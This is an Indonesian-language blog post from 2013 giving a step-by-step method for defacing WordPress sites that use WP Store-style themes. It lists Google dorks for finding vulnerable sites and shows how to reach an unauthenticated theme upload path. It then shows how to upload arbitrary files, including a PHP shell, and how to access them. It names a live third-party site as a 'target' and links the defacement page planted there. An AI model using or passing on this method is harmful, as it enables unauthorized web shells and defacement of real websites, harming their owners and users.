Monday, November 25, 2013

Deface WordPress Dengan Bug WP STORE



Selamat Subuh Bro :) ) , pada kesempatan Ini saya akan share Exploit WordPress WP-STORE
Okeh langsung aje ye kak =))

Dork :
inurl:/wp-content/themes/WPstore/
site:.th inurl:ptype=cart
site:.th inurl:ptype=store
NB : Site bisa di ganti sesuka kamu :p .il .mm dsb.
  1. WPStore
  2. eShop
  3. KidzStore
  4. Emporium
  5. Store
  6. eCommerce
  7. framework
  8. frameworkold
Theme bisa diganti [ganti pada bagian belakangnya itu lho]
1. Googling dengan menggunakan salah satu dork itu
2. Kalo udah ketemu tambahin /upload/ setelah path tema
[ex : http://localhost/wp-content/themes/framework/upload/]
3. Silakan upload ditempat itu, bisa berupa
php , txt , html , dll
4. Akses di mari
[http://localhost/wp-content/uploads/products_img/shell.php]

Live Target :

http://www.wholisticnutrition.com.au/
ini hasilnya http://www.wholisticnutrition.com.au/wp-content/uploads/products_img/mca.html  :D

0 comments:

Post a Comment